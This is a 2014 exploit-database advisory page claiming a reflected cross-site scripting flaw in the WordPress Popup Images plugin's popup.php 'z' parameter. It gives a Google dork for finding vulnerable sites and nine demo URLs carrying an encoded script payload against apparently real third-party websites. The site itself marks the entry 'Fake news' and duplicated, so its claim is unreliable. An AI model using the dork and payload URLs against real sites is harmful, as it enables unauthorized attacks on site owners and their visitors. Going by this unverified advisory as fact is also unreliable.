WordPress Popup Images Cross Site Scripting

WARNING! Fake news / Uwaga! Nota nieprawdziwa

WordPress Popup Images Cross Site Scripting

2014.06.02

Credit: Milad Hacking

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:/wp-content/plugins/popup-images

DUPLICATED

http://cxsecurity.com/issue/WLB-2014050118

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress Plugin Popup Images Cross Site Scripting
[+]
[+] Exploit Author: Milad Hacking
[+]
[+] Date: 2014-06-1
[+]
[+] Google Dork : inurl:/wp-content/plugins/popup-images
[+]
[+] Vendor Homepage : http://www.Wordpress.org
[+]
[+] Tested on: Windows 7 , Mozilla FireFox
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Location :
[localhost]/wp-content/plugins/popup-images/popup.php?z=[XSS]

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Demo :

http://www.kornXels-welt.de/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20LOL/%29;%3C/script%3E

http://www.lioXns-borsdorf-parthenaue.de/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://thefilmlXot.com/tflblogwp/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tsXcktsarina.com/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://sinkaXrto.hu/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.liXons-borsdorf-parthenaue.de/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tomaXsvasquez.com.br/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.toXmasvasquez.com.br/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tomasvXasquez.com.br/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E


[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Discovered By : Milad Hacking

We Love Mohammad

Mail : milad.hacking.blackhat@gmail.com

Home Page : https://www.facebook.com/milad.hacking.5

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

Referencje:

http://cxsecurity.com/issue/WLB-2014050118

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Popup Images Cross Site Scripting

Dork: inurl:/wp-content/plugins/popup-images

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.